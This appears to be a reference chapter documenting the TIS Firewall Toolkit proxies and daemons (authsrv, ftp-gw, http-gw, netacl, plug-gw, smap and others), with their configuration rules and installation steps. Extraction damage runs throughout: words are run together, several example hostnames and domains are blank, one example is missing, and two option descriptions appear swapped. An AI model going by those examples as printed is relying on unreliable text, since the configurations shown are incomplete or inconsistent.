Operation rules are stored in netperm-table. For each user/group the name is specifiedfollowed by the service destination [optional tokens] [time start end]. The user/group fieldindicates whether the record is for a user or a group. The name is either the username or thegroup name. The service can be any service specified by the proxy (usually ftp-gw, tn-gw, orrlogin-gw); the destination can be any valid domain name. The optional tokens are checked fora match, permitting a proxy to send a specific operation check to the authentication server.The time field is optional and must be specified time start_time end_time. The start_time andend_time parameters can be in the range 00:00 to 23:59. Here are a string of commands thatspecify who can use a service and when:

authsrv permit-operation user mjr telnet-gw time 08:00 17:00authsrv deny-operation user mjr telnet-gw time 17:01 07:59authsrv permit-operation group admin telnet-gw * time 08:00 17:00authsrv deny-operation user mjr telnet-gw time 17:01 07:59authsrv permit-operation group admin telnet-gw *.comauthsrv deny-operation group admin ftp-gw *.com put time 00:00 23:59

InstallationTo install authsrv, configure the database option in netperm-table and initialize the database.To initialize the database, use the command su to go to the root directory, run authsrv at thecommand line, then issue the following commands:

# # authsrv

-administrator mode- authsrv# list Report for users in database user group longname ok? proto last ---- ----- -------- --- ----- ---- authsrv# adduser admin ‘Auth DBA’ ok - user added initially disabled authsrv# ena admin enabled authsrv# proto admin Snk changed authsrv# pass ‘160 270 203 065 022 034 232 162’ admin Secret key changed authsrv# list

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Report for users in database user group longname ok? proto last ---- ----- -------- --- ----- ---- admin Auth DBA ena Snk never authsrv# quit #

In this example, the administrator account is established, then enabled, a protocol is assigned,and the initial password is set. The format of the set password depends on the authenticationprotocol used for the record. In this example, the administrator record is using a SecureNetKey, so the password record consists of the shared secret key used by the device.

After the database is initialized, add necessary hosts entries to netperm-table, install authsrv ininetd.conf, then restart inetd. Verify that authsrv is running by telnetting to the service port.

Note Ensure that the database is protected against casual perusal by checking its filepermissions.

ftp-gw—FTP Proxy Server

Synopsisftp-gw [autheduser] [user@host]

Descriptionftp-gw provides pass-through FTP proxy services with logging and access control. When ftp-gw is invoked from inetd, it reads its configuration and checks to see if the system that has justconnected is permitted to use the proxy. If not, ftp-gw shuts down the connection, displays amessage, and logs the connection. If the peer is permitted to use the proxy, ftp-gw enters acommand loop in which it parses all FTP requests and passes them to a remote FTP server.Any FTP request can be selectively logged or blocked by the proxy.

Two methods are supported to permit users to specify the system they want to FTP to throughthe proxy. The most commonly used is encoding the destination system name in theusername:

% ftp gatekeeperConnected to gatekeeper.220 gatekeeper FTP proxy (Version 1.0) ready.Name (host:user): user@somplace331-(----GATEWAY CONNECTED TO someplace----)331-(220 someplace FTP server (Version 5.60/mjr) ready.)331 Password required for user.Password:230 User user logged in.Remote system type is Unix.

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Using binary mode to transfer files.ftp> quit221 Goodbye.%

A second means of specifying the remote through the proxy is through the passerve servernameoption, which causes the proxy to immediately connect to the specified remote system. This isuseful in supporting modified ftp clients that “understand” the proxy.

Options-a autheduser

This option is provided for versions of ftpd that may exec( ) the proxy if given a user@host typeaddress, where the user has already authenticated to the ftpd. If this option is provided, ftp-gwwill treat the session as if it has been authenticated for the specified user. If this option isenabled, care should be taken to ensure that the FTP gateway is running on a host withrestricted access, to prevent local users from attempting to spoof the authentication. Theversion of ftpd used should only pass this parameter when the user has been adequatelyauthenticated.

-u user@host

This option enables a user@host destination to be passed directly to the proxy, for versions offtpd that recognize user@host addresses.

ftp-gw reads its configuration rules and permissions information from the firewall configura-tion table netperm-table, and retrieves all rules specified for “ftp-gw”. The following configura-tion rules are recognized:

userid user

These rules specify a numeric user-id or the name of a password file entry. If this value isspecified, ftp-gw will set its user-id before providing service. Note that this option is includedmostly for completeness; ftp-gw performs no local operations that are likely to introduce asecurity hole.

To specify a directory to which ftp-gw will chroot(2) prior to providing service, use thecommand:

directory pathname

The name of a file to display to the remote user if he or she is denied permission to use theproxy is entered with the command:

denial-msg filename

If this option is not set, a default message is generated. When the denial-msg file is displayed tothe remote user, each line is prefixed with the FTP codes for permission denied.

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To specify the name of a file to display as a welcome banner upon successful connection, usethe command:

welcome-msg filename

If this option is not set, a default message is generated. The help command can also be used todisplay a particular file you want to use for help. To specify the file to use if help is issued, usethe command:

help-msg filename

If this option is not set, a list of the internal commands is printed.

To specify the name of a file to display if a user attempts to connect to a remote server forwhich he or she is restricted, use the command:

denydest-msg filename

If this option is not set, a default message is generated.

The following command specifies the idle timeout value in seconds:

timeout seconds

When the specified number of seconds elapses with no activity through the proxy server, it willdisconnect. If this value is not set, no timeout is enforced.

The following rules specify host and access permissions:

hosts host-pattern [host-pattern2 ...] [ options ]

Typically, a hosts rule will be in the form of:

ftp-gw: deny-hosts unknownftp-gw: hosts192.33.112.* 192.94.214.* -log { retr stor }

There may be several host patterns following the “hosts” keyword, ending with the firstoptional parameter beginning with “-”. Optional parameters permit the selective enabling ordisabling of logging information. Sub-options include:

■ -noinput. Specifies that no matter what, the proxy should not accept input over aPORT. Attempts to do so result in the port being closed.

■ -nooutput. Specifies that no matter what, the proxy should not transmit output over aPORT. Attempts to do so result in the port being closed.

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■ -log. Specifies that a log entry to the system log should be made whenever the listedoperations are performed through the proxy. (See ftpd for a list of known FTP opera-tions). The format is as follows:

-log operation

-log { operation1 operation2 ... }

■ -authall. Specifies that the proxy should permit no operation (other than the quitcommand) until the user has authenticated to the server. The format is as follows:

-auth operation

-auth { operation1 operation2 ...}

■ -auth. Specifies that the operations listed should not be permitted until the user hasauthenticated to the server. The format is as follows:

-dest pattern

-dest { pattern1 pattern2 ... }

■ -dest. Specifies a list of valid destinations. If no list is specified, all destinations areconsidered valid. The -dest list is processed in the order it appears on the options line. -dest entries preceded with a ‘!’ character are treated as negation entries. The followingrule permits hosts that are not in the domain “” to be connected:

-dest !* -dest *

■ -deny. Specifies a list of FTP operations to deny. By default, all operations are permit-ted. The format is as follows:

-deny operation-deny { operation1 operation2 ... }

AuthenticationUnless the user is employing a version of the FTP client program that has support for authenti-cation through challenge/response, he or she will be required to employ the quote command tocommunicate directly with the proxy. For authentication, the proxy recognizes the followingoptions:

authorize usernameauth username (shorthand form)response passwordresp password (shorthand form)If the proxy requires authentication, attempts to use the service requested will➥not be permitted.% ftp gatekeeperConnected to gatekeeper.220 gatekeeper FTP proxy (Version 1.0 stable) ready.

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Name (host:user): user@somplace500 command requires user authenticationLogin failed.ftp> quote auth mjr331 Challenge “655968”ftp> quote response 82113230 Login Acceptedftp> user user!@somplace331-(----GATEWAY CONNECTED TO someplace----)331-(220 someplace FTP server (Version 5.60/mjr) ready.)331 Password required for user.Password:

Unfortunately, whenever the quote command is used passwords are visible. If authentication isbeing used, it should be of a changing-password or token authentication form, to eliminate thethreat of passwords being seen or tapped through a network.

InstallationTo install ftp-gw, place the executable in a system area, then modify /etc/inetd.conf. The TCPservice port on which to install the FTP proxy will depend on local site configuration. If thegateway machine that is to run the proxy does not require the presence of local FTP service,the proxy can be installed on the FTP service port. If the firewall doubles as an anonymousFTP archive, the proxy should be installed at another port.

To use the proxy there, the FTP client application ftp must support the use of an alternateservice port. Most BSD Unix versions of the FTP client do, but some PC or Macintoshversions do not. After inetd.conf has been modified, restart or reload inetd. Verify installationby attempting a connection, and then monitoring the system logs.

Typical configuration of the proxy in a firewall setup includes the use of rules, which block allsystems that are not in the DNS from using the proxy, but permit all systems on the internalprotected network to use the proxy. Here is an example:

ftp-gw: deny-hosts unknown ftp-gw: hosts 192.33.112.*

192.94.214.* -log { retr stor }

http-gw—Gopher/HTTP Proxy

Synopsishttp-gw [ options ](invoked from inetd)

Descriptionhttp-gw provides Gopher and HTTP proxy services with logging and access control. Thisprogram allows Gopher and Gopher+ client to access Gopher, Gopher+, and FTP servers. Italso allows WWW clients such as Mosaic to access HTTP, Gopher, and FTP servers. Both

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standard and proxy-aware WWW clients are supported. The proxy supports common use ofthe Gopher, Gopher+, and HTTP protocols. Except where noted, client means Gopher,Gopher+, WWW, or proxy aware WWW clients; server means Gopher, Gopher+, HTTP, orFTP servers.

Proxy aware clients should be configured to use the proxy. Non proxy aware clients should beset up so that their HOME PAGE is the proxy. If you are installing a firewall on a system thatalready includes users with Gopher or WWW access, these users need to edit their Hotlists toroute the requests through the proxy.

■ WWW (URLs). Insert the string http://firewall/ in front of the existing URL.

■ Gopher. Change the Gopher menu information from




This example assumes that the proxy has been configured to be on the default HTTP andGopher ports (80 and 70, respectively).

Options■ -d file. This option can only be used if the proxy was compiled with BINDDEBUG. It

allows debugging information to be written to the specified file.

■ -D. This option turns on the debugging log if specified. The proxy must be compiledwith BINDDEBUG for the option to be recognized.

Operationhtttp-gw is invoked from inetd(8); it reads its configuration and checks to see if the system thathas just connected is permitted to use the proxy. If not, it returns a message/menu and logs theconnection. If the peer is permitted to use the proxy, http-gw reads in a single line requestwhich it then decodes. If needed, more lines are read from the client. Most requests carry theinformation that the proxy needs in the first line.

When a user initiates a request, the client determines three pieces of information: host, port,and a selector. The client then connects to the host on the port and sends the selector. Whenusing a proxy, the host and port refer to the proxy itself. The proxy has to determine the hostand port from information contained in the selector. The proxy does this by re-writing theinformation it passes back to the client. Both Gopher and WWW clients do none or only

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minimal processing on the selector. If the proxy cannot find it’s special information in theselector, it looks in it’s configuration file to see if a server has been defined to which it canhand off the request.

The proxy has to process three types of information:

■ Gopher menus. These contain a description (displays for the user), a selector, a host,and a port. The first character of the description tells the client the type of informationthe entry refers to.

■ HTML files. Contains hypertext that can contain embedded links to other documents.The proxy has to parse the HTML file and re-write the links so that the client routes therequest through the proxy.

■ Other data files. Roughly classified as text or binary data. The proxy passes the datathrough without changing it.

The proxy encodes the extra information into the selector by converting it into a URL(Universal Resource Locator). This is also the form of selector that is used in HTMLdocuments.

When building a Gopher Menu from an FTP directory list, the proxy has to guess whatGopher type to specify by looking at the file extension. The following table lists gopher typesand their related extensions.

Description Gopher Type Extensions

GIF Image g .gif

DOS archives 5 .zip .zoo .arj .arc .lzh

DOS binaries 9 .exe .com .dll .lib .sys

Misc Images I .jpg .jpeg .pict .pct .tiff .tif .pcx

Unix binaries 9 .tar .z .gz

MAC archives 4 .hqx

Misc sounds s .au .snd .wav

HTML Documents h .html .htm

Misc Documents 9 .doc .wri

Directories 1 Filenames that end in /

Plain text 0 All other extensions

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Configurationhttp-gw reads its configuration rules and permissions information from the firewall configura-tion table netperm-table, retrieving all rules specified for “http-gw” and “ftp-gw.” The “ftp-gw” rules are consulted when looking for host rules after the “http-gw” rules have beensearched. The following configuration rules are recognized:

userid user

Specifies a numeric user-id or the name of a password file entry. If this value is specified, http-gw will set its user-id before providing service. Note that this option is included mostly forcompleteness; HTTP-GW performs no local operations likely to introduce a security hole.

directory pathname

Specifies a directory to which http-gw will chroot(2) prior to providing service.

timeout secondsvalue

The preceding value is used as a dead-watch timer when the proxy is reading data from the net.Defaults to 60 minutes.

default-gopher server

The default-gopher option specifies a Gopher server that receives handed off requests.

default-httpd server

The default-httpd option defines an HTTP server that receives handed off requests if therequests come from a WWW client using the HTTP protocol.

ftp-proxy server

The ftp-proxy server option defines an ftp-gw that should be used to access FTP servers. If thisrule isn’t specified, the proxy will do the FTP transaction with the FTP server. Because the ftp-gw rules will be used if there are no relevant http-gw rules, this is not a major problem.

hosts host-pattern [host-pattern ...] [options]deny-hosts host-pattern [host-pattern ...]

The deny-hosts rule specifies host and access permissions. Typically, a hosts rule will be in theform of:

http-gw: deny-hosts unknownhttp-gw: hosts 192.33.112.* 192.94.214.*

Several host patterns may follow the “hosts” keyword, ending with the first optional parameterbeginning with “-”. Optional parameters permit the selective enabling or disabling of logginginformation.

permit-hosts options

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The permit-hosts rule can use options. Some of the options take parameters. The functions aredefined later (see “Gopher Functions”).

-permit function-permit { function [function ...] }

The -permit option permits only the specified functions. Other functions will be denied. If thisoption is not specified then all functions are initially permitted.

-deny function-deny { function [function ...] }

The -deny option specifies a list of Gopher/HTTP functions to deny.

-gopher server

The -gopher option makes the specified server the default server for this transaction.

-httpd server

The -httpd option makes server the default HTTP server for this transaction. This will be usedif the request came in through the HTTP protocol.

-filter function-filter { function [function ...] }

The -filter option removes the specified functions when rewriting selectors and URL’s. Thisoption does not stop the user from entering selectors that the client will execute locally, butthis option can be used to remove selectors from retrieved documents.

The following options are also acceptable because they can be specified on an ftp-gw configline:


The -noinput option disables data read functions.


The -nooutput option disables data write functions.

-log function-log { function [function ...] }

The -log option specifies that a log entry to the system log should be made whenever the listedfunctions are performed through the proxy.


The -authall option specifies that all functions require the user to be authenticated.

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-auth function-auth { function [function ...] }

The -auth option specifies that the functions listed require the user to be authenticated.

-dest pattern-dest { pattern [pattern ...] }

The -dest option specifies a list of valid destinations. If no list is specified, all destinations areconsidered valid. The -dest list is processed in the order it appears on the options line. -destentries preceded with a ‘!’ character are treated as negation entries. For example, the followingrule permits hosts that are not in the domain “” to be connected.

:-dest !* -dest *

Gopher FunctionsThe proxy characterizes each transaction as one of a number of functions. For the deny optionsthe request is used. For filter options the returned selectors are used.

Function Description

dir Fetching Gopher menusGetting a directory listing via FTPFetching an HTML document (this is being studied)

read Fetching a file of any typeHTML files are treated as read even though they are also of dir format

write Putting a file of any typeNeeds plus because it is only available to Gopher+ and HTTP/1.x

ftp Accessing an FTP server

plus Gopher+ operationsHTTP methods other than GET

wais WAIS index operations

exec Operations that require a program to be run, such as telnet. (See“Security.”)

SecurityThe most important security configuration you need to be aware of is the way certain func-tions are handled by the client, server, and proxy programs. When the client wants to performcertain actions, such as telnet, the client program often runs the telnet command to perform

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the function. If the client passes arguments to the program, there is a chance of rogue com-mands along with the intended command. Gopher requests to do FTP operations cause theserver to run the FTP program. Again, the server could be tricked into running rogue com-mands with the commands to run the FTP program.

Most client programs only know how to display a small number of data types; they rely onexternal viewers to handle the other data types. Again, this arrangement jeopardizes securitybecause of the chance that client programs can be tricked into running rogue commands.

InstallationTo install HTTP-GW place the executable in a system area, then modify /etc/inetd.conf. TheTCP service port on which to install the Gopher/HTTP proxy depends on local site configura-tion. You would normally configure the proxy to be on ports 70 and 80. 70 is the normalGopher port and 80 is the normal HTTP port. After inetd.conf has been modified, restart orreload inetd. Verify installation by attempting a connection and monitoring the system logs.

Typical configuration of the proxy in a firewall situation involves rules to block all systems thatare not in the DNS from using the proxy, but to permit all systems on the internal protectednetwork to use the proxy, as in this example:

http-gw: deny-hosts unknownhttp-gw: hosts 192.33.112.* 192.94.214.*

login-sh—Authenticating Login Shell

Synopsislogin-sh (invoked from /bin/login)

Descriptionlogin-sh provides a simple interface to the authentication service for login by replacing theuser’s login shell with a “wrapper” that requires the user to authenticate first; the program thenexecutes the real login shell. login-sh may be used in conjunction with or as a replacement forpasswords in the password file /etc/passwd. The user’s actual login shell information is storedin an external file.

Note that login-sh runs as the user with his or her permissions. This is attractive because itseparates the authentication policy from the permissions granting policy (/bin/login).

Optionslogin-sh reads its configuration rules and permissions information from the firewall configura-tion table netperm-table, retrieving all rules specified for “login-sh.” The following configura-tion rules are recognized:

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authserver address port

This command specifies the network address and service port of the authentication server touse.

shellfile pathname

The shellfile command specifies a file containing information about users’ login shells (theshell configuration file). Empty lines and lines with a pound sign (#) as the first character arediscarded or treated as comments. The format of the shell configuration file is a list of entries,one per line:

userid executable parameter-0 [parameter-1] [parameter-n]

The first three values must be defined. The userid field matches the login name of the userinvoking login-sh from the /etc/passwd file. The second field should specify the executablepathname of the program to run after authentication is completed. The third and remainingfields are parameters to pass to the executable program, starting at parameter zero. Manycommand interpreters check the name of parameter zero (argv[0]) to determine if they are alogin shell. When you use these command interpreters, make sure you define them with theirrequired forma—typically a leading dash “-”.

InstallationTo install login-sh place the executable in a system area, and then define the shellfile andauthserver options in netperm-table. Systems that are using login-sh should have all programsthat permit users to change their login shells disabled, or should have the setuid bit stripped.

File entries for users’ passwords should resemble this example:

mjr::100:10:Marcus J Ranum:/home/mjr:/usr/local/etc/login-sh

A sample shellfile entry for mjr is shown here:

mjr /usr/bin/ksh -ksh

Note in the example that the pathname (/usr/bin/ksh) and the first parameter for the program(“-ksh”) are different. A minimum of two parameters must exist for each login shell that isdefined.

Users who want both password authentication and secondary authentication can set passwordson their entries in /etc/passwd and also use login-sh.

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netacl—TCP Network Access Control

Synopsis netacl servicename (invoked from inetd)

Descriptionnetacl provides a degree of access control for TCP-based services invoked from inetd(8). Whena server is started, inetd invokes netacl with the name of the service requested, rather than theactual server. netacl then searches its permissions information (read from netperm-table ) to seeif the host initiating the connection is authorized. If the host is authorized, the real serverprocess is invoked; otherwise, netacl exits. Acceptance or rejection of the service is loggedthrough the syslog facility.

netacl duplicates functionality found in other tools such as log_tcp by Wietse Venema, but isincluded with the Toolkit because it is a simpler implementation, contains no support forUDP services, and shares a common configuration file with the rest of the Toolkit compo-nents.

Optionsnetacl accepts one parameter: the name of the service it is to provide. This service name isappended to the string “netacl-” to generate the name by which rules are read from thenetperm-table configuration file. If invoked with no parameters, the service is assumed to bethe program name, just in case an administrator needs to replace the executable of somedaemon with a copy of netacl. For example, if netacl is invoked using the following command,it will retrieve all the configuration rules for netacl-in.telnetd:

netacl in.telnetd

The following configuration rules are recognized:

hosts [options]

The hosts rule specifies a host permission rule. Host permission rules are in the form:

netacl-in.telnet permit-hosts host1 host2 -optionsnetacl-in.telnet deny-hosts host1 host2 -options

Following the permit-hosts or deny-hosts clause is a list of host names or IP-addresses that cancontain wildcards. Host names are searched in order until the first option (starting with a ‘-’) isencountered, at which point, if there is a match for that rule, it will be accepted. If the ruleis a deny-hosts rule, the program will log the denial of the service and exit. If the rule is a

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permit-hosts rule, the options will be processed and executed in order. If no rule is explicitlypermitting or denying a service, the service is denied. Options include:

■ -exec executable [args]. Specifies a program to invoke to handle the service. Thisoption must be the final option in the rule. An -exec option must be present in everyrule.

■ -user userid. userid is the numeric UID or the name from a login in /etc/passwd that isused to invoke the program.

■ -chroot rootdir. Specifies a directory to which netacl should chroot(2) prior toinvoking the service program. This requires that the service program be present, and thepathname for the executable be relative to the new root.

ExamplesIn this example, the \ line wraps have been added to fit lines on the page. \-escapes are notpermitted in netperm-table—they are here only as part of the example.

netacl-in.telnetd: permit-hosts 192.33.112.* -exec /usr/etc/in.telnetdnetacl-in.ftpd: permit-hosts unknown -exec /bin/cat /usr/local/etc/noftp.txtnetacl-in.ftpd: permit-hosts 192.33.112.* -exec /usr/etc/in.ftpdnetacl-in.ftpd: permit-hosts * -chroot /home/ftp -exec /bin/ftpd -f

In this example, netacl is configured to permit telnet only for hosts in a particular subnet. ftpdis configured to accept all connections from systems that do not have a valid DNS name(“unknown”) and to invoke cat to display a file when a connection is made. This provides aneasy and flexible means of politely informing someone that he or she is not permitted to use aservice. Hosts in the specified subnet are connected to the real FTP server in /usr/etc/in.ftpd.Connections from other networks are connected to a version of the FTP server that is alreadychrooted to the FTP area, effectively making all FTP activity “captive.”

InstallationTo install netacl, place the executable in a system area, then modify /etc/inetd.conf as desired,replacing entries for the servers that will be controlled via netacl. For example, the FTP servicemight be configured as follows (syntax may differ slightly depending on O/S version):

ftp stream tcp nowait root /usr/local/etc/netacl in.ftpd

After inetd.conf has been modified, restart or reload inetd. Verify installation by attempting aconnection and monitoring the system logs.

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plug-gw—Generic TCP Plugboard Proxy

Synopsisplug-gw portnumber/name (invoked from inetd)

Descriptionplug-gw provides pass-through TCP services with logging and access control for genericconnection-oriented applications such as NNTP. When plug-gw is invoked from inetd, itreads its configuration and checks to see if the system that has just connected is permitted touse the proxy. If not, it shuts down and logs the connection. If the peer is permitted to use theproxy, plug-gw determines (based on its configuration) what host to connect to on the “otherside.”

Note The service port plug-gw is servicing must be specified on the command line.

Optionsplug-gw reads its configuration rules and permissions information from the firewall configura-tion table netperm-table, and retrieves all rules specified for “plug-gw.” The following configu-ration rules are recognized:

timeout seconds

The timeout rule specifies a timeout value to wait until an inactive connection is disconnected.If no timeout is specified, the default is to remain connected until one side or the other closesits connection.

port portid hostpattern [options]

The port option specifies a connection rule. When a connection is made, a match is searchedfor on the port-id and calling host. The port-id may be either a numeric value (such as 119) ora value from /etc/services (such as “nntp”). If the calling port matches, then the host-pattern ischecked for a match, following the standard address matching rules employed by the firewall.If the rule matches, the connection will be made based on the remaining options in the rule, allof which begin with ‘-’. Sub-options include:

■ -plug-to host. Specifies the name or address of the host to connect to. This option ismandatory.

■ -privportt. Indicates that a reserved port number should be used when connecting.Reserved port numbers must be specified for protocols such as rlogin, which rely onthem for “security.”

■ -port- portid. Specifies a different port. The default port is the same as the port usedby the incoming connection.

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InstallationTo install plug-gw place the executable in a system area, then modify inetd.conf to install plug-gw for whatever services will be plugboarded. Reinitialize inetd and test by connecting to theport.

plug-gw was designed to permit “tunneling” NNTP traffic through firewalls, but it can be usedfor a variety of purposes such as permitting remote access to a single service on a single host.Typically, when configured for NNTP traffic, the user’s software is configured so that internalNNTP connections to the outside news server connect to the firewall and are automaticallyplugboarded to the external NNTP server, and vice versa. The USENET news software mustthen be configured so that both the internal and external NNTP servers believe they areexchanging news with the firewall machine.

ExamplesThe following entries permit NNTP transfer through a firewall bastion host. In this examplethe interior news server host is “” ( and the externam news server is“nntp.outside.someplace” ( The bastion host, where the software is installed, is“” On the bastion host, you place an entry for the NNTP service in inetd.conf:

nntp stream tcp nowait root /usr/local/etc/plug-gw plug-gw nntp

The plug gateway is invoked as “plug-gw nntp” to inform it that it is providing NNTP service.The configuration entries in netperm-table are as follows:

plug-gw: timeout 60plug-gw: port webster 111.11.1.* -plug-to WEBSTER.LCS.MIT.EDU -port websterplug-gw: port nntp -plug-to -port nntpplug-gw: port nntp -plug-to -port nntp

Whenever connects to the bastion host, it is automatically connected to222.22.2.22’s nntp service. The news software on should be configured to believethat its news server is the bastion host “”—the host from which it transfers andreceives news. Note too that a simple webster service is provided by plugging webster onanother host over the Internet to the webster service port on the bastion host.

BugsBecause incoming connection hosts can be wildcarded, plug-gw works well in a many-to-onerelationship but does not work at all in a one-to-many relationship. If, for example, a site hasthree news feeds, it is easy to configure plug-gw to plugboard any connections from those threehosts to an internal news server. Unfortunately, the software will have to be modified ifmultiple instances of plug-gw are on the same port, or the internal news server’s softwarecannot support connecting on a non-standard port.

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rlogin-gw—rlogin Proxy Server

Synopsisrlogin-gw (invoked from inetd)

Descriptionrlogin-gw provides pass-through rlogin proxy services with logging and access control. Whenrlogin-gw is invoked from inetd, it reads its configuration and checks to see if the system thathas just connected is permitted to use the proxy. If not, it shuts down, displays a message, andlogs the connection. If the peer is permitted to use the proxy, rlogin-gw checks the usernamethat is provided as part of the rlogin protocol, and if it is in the form user@host, an attempt ismade to reconnect to the host and log in as that user. If no host is specified, rlogin-gw enters acommand loop in which it waits for a user to specify the following:

■ The system the user want to connect to

■ The X-gateway the user wants to invoke

Optionsrlogin-gw reads its configuration rules and permissions information from the firewall configu-ration netperm-table, where it retrieves all rules specified for “rlogin-gw.” The followingconfiguration rules are recognized:

directory pathname

This rule specifies a directory to which rlogin-gw will chroot(2) prior to providing service.

prompt string

The prompt rule specifies a prompt for rlogin-gw to use while it is in command mode.

timeout seconds

The timeout rule specifies the time, in seconds, the system remains idle before disconnectingthe proxy. Default is no timeout.

denial-msg filename

The denial-msg rule specifies the name of a file to display to the remote user if he or she isdenied permission to use the proxy. If this option is not set, a default message is generated.

help-msg filename

The help-msg rule specifies the name of a file to display if the “help” command is issued. Ifthis option is not set, a list of internal commands is printed.

denydest-msg filename

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The denydest-msg rule specifies the name of a file to display if a user attempts to connect to aremote server for which he or she is restricted. If this option is not set, a default message isgenerated.

authserver hostname [portnumber [cipherkey] ]

The authserver rule specifies the name or address of a system to use for network authentica-tion. If tn-gw is built with a compiled-in value for the server and port, the built-in values willbe used as defaults but can be overridden if specified in the command line. If the serversupports DES-encryption of traffic, an optional cipherkey can be provided to secure communi-cations with the server.

hosts host-pattern [host-pattern2 ... ] [ options]

The hosts rules specify host and access permissions. Typically, a hosts rule will be in theform of:

rlogin-gw: deny-hosts unknownrlogin-gw: hosts 192.33.112.* 192.94.214.*

Several host patterns might follow the “hosts” keyword, ending with the first optional param-eter beginning with “-”. Optional parameters are:

-dest pattern-dest pattern1 pattern2 ...

The -dest option specifies a list of valid destinations. If no list is specified, all destinations areconsidered valid. The -dest list is processed in the order it appears on the options line. -destentries preceded with a “!” character are treated as negation entries. The following rule permitshosts that are not in the domain “” to be connected.

-dest !* -dest *-auth

The -auth option specifies that the proxy should require a user to authenticate with a validuser-id prior to being permitted to use the gateway.


The -passok option specifies that the proxy should permit users to change their passwords ifthey are connected by the designated host. Only hosts on a trusted network should be permit-ted to change passwords, unless token-type authenticators are distributed to all users.

InstallationTo install rlogin-gw place the executable in a system area, then modify inetd.conf to reflect theappropriate executable path. The rlogin proxy must be installed on the rlogin port (port 513)in order to function without requiring modified clients. Verify installation by attempting aconnection and monitoring the system logs.

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smap—Sendmail Wrapper Client

Synopsissmap (invoked from inetd)

DescriptionThe smap client implements a minimal version of SMTP, accepting messages from over thenetwork and writing them to disk for future delivery by smapd. smap is designed to run underchroot(2) as a non-privileged process. This arrangement overcomes potential security riskspresented by privileged mailers running where they can be accessed from over a network.

smap is invoked from inetd and exits when its session is completed. Each session’s mail isrecorded in a temporary file in its spool directory, with the SMTP envelope encoded in theheading of the file. To coordinate processing with smapd the file is locked while it is beingwritten. As a secondary means of signaling when a message is completely gathered, the mode ofthe file, which is initially 644, is changed to 755. In this manner the system can identifytruncated or partial files left after a system crash or reboot.

Optionssmap takes no command-line options. All configuration rules in netperm-table for application“smap” are read, and the following clauses and parameters are recognized:

userid name

The userid option specifies the userid that smap should run under. The name can be either aname from the password database, or a numeric user-ID. This userid should be the same as theID under which smapd runs, and should have write permission to the spool directory.

directory pathname

The directory option specifies the spool directory where smap should store incoming messages.A chroot(2) system call is used to irrevocably make the specified directory the root filesystemfor the remainder of the process.

maxbytes value

maxbytes specifies the maximum size of messages to gather, in bytes. If no value is set, messagesizes are limited by the amount of disk space in the spool area.

maxrecip value

The maxrecip option specifies the maximum number of recipients allowed for any message.This option is only for administrators who are worried about the more esoteric denial ofservice attacks.

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timeout value

This option specifies a timeout, after which smap should exit if it has not collected a message.If no timeout value is specified, smap will never time out a connection.

InstallationTo install smap, locate the spool directory where mail will be collected. Identify the userid thatsmap will run as (generally daemon), and make sure that it owns the spool directory. Installsmap in /etc/inetd.conf as follows (pathnames may change):

smtp stream tcp nowait root /usr/local/etc/smap smap

After modifying /etc/inetd.conf you need to signal inetd to reload its configuration informa-tion; you also need to make sure that sendmail is no longer running on the system.

In the spool directory, it may be necessary to make an /etc directory with system-specificconfiguration files if the C support library on the host Unix requires them. Usually, the bestrecommendation is to build smap so that it is completely standalone; that is, a statically-linkedexecutable that is linked to a resolver library that will not crash if it is unable to read /etc/resolv.conf. A small number of support files (/etc/hosts, /etc/resolv.conf) may be required. Becareful not to install any device files or executables in the spool directory. Test installation byusing telnet to connect to the SMTP port.

Note smap assumes that smapd will also be running on the system.

smapd—Sendmail Wrapper Daemon

Synopsissmapd (invoked from rc.local)

DescriptionThe smapd daemon periodically scans the mail spool area maintained by smap and delivers anymessages that have been gathered and stored. Mail is delivered via sendmail and the spool file isdeleted. If the mail cannot be delivered normally, smapd can be configured to store spooledfiles to an area for later examination.

Optionssmapd takes no command-line options, and reads its configuration information from thefirewall Toolkit configuration file netperm-table. All configuration rules in netperm-table forapplication “smapd” are read, and the following clauses and parameters are recognized:

executable pathname

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The executable option specifies the pathname of the smapd executable itself. For historicalreasons, smapd forks and execs copies of itself to handle delivering each individual message.This entry is mandatory.

sendmail pathname

The sendmail option specifies an alternate pathname for the sendmail executable. smapdassumes the use of sendmail but does not require it. An alternate mail delivery system canreplace sendmail, but to do so it needs to be able to accept arguments in the form of:

executable -f fromname recip1 [recip2 ...]

The reason for this requirement is the exit code from the mailer is used to determine the statusof delivery. Replacements for sendmail should use similar exit codes.

baddir pathname

The baddir option specifies a directory where smapd should move any spooled mail thatcannot be delivered normally. This directory must be on the same device as the spool directorybecause the rename(2) system call is employed. The pathname specified should not contain atrailing forward slash (/).

userid name

The userid option specifies the userid under which smapd should run. The name can be eithera name from the password database, or a numeric user-ID. This userid should be the same asthe one smap uses when it runs, and should have write permission to the spool directory.

directory pathname

The directory option specifies the spool directory in which smapd should search for files.smapd should have write permission to this directory.

wakeup value

wakeup specifies the number of seconds smapd should sleep between scans of the spooldirectory. The default is 60 seconds.

InstallationTo install smapd configure the executable and directory options in netperm-table and addthem to /etc/rc.local. A sample netperm-table configuration for ssmap and smapd looks likethis:

# email wrapper controlsmap, smapd: userid 4smap, smapd: directory /mail/inspoolsmapd: executable /usr/local/etc/smapdsmap: maxrecip 4000smap: maxbytes 1048576smap: timeout 3600

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In this example, both smap and smapd are running with user-id #4 (uucp) in the spooldirectory /mail/inspool. Because sendmail is not running in daemon mode, messages thatcannot be delivered and are queued must be delivered by periodically invoking sendmail toprocess the queue. To do this, add something similar to the following line in the crontab file:

0,30 * * * * /usr/lib/sendmail -q > /dev/null 2>&1

tn-gw—telnet Proxy Server

Synopsistn-gw [invoked from inetd]

Descriptiontn-gw provides pass-through telnet proxy services with logging and access control. When tn-gwis invoked from inetd, it reads its configuration and checks to see if the system that has justconnected is permitted to use the proxy. If not, tn-gw shuts down the connection, displays amessage, and logs the connection. If the peer is permitted to use the proxy, tn-gw enters acommand loop in which it waits for a user to specify:

■ The system he or she wants to connect to

■ The X-gateway he or she wants to invoke

c[onnect] hostname [port]Connects to a host.sol-> telnet otterTrying ...Connected to otter.Escape character is ‘^]’.otter telnet proxy (Version V1.0) ready:tn-gw-> helpValid commands are:connect hostname [port]x-gw [display]help/?quit/exittn-gw-> c hiloHP-UX hilo A.09.01 A 9000/710 (ttys1)login: Remote server has closed connectionConnection closed by foreign host.sol->

Because of limitations in some telnet clients, options negotiation may possibly fail; such anevent will cause characters not to echo when typed to the tn-gw command interpreter.

x-gw [display/hostname]

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The x-gw option invokes the x-gateway for connection service to the user’s display. The defaultdisplay (without the argument) is the connecting hostname followed by port number 0.0.

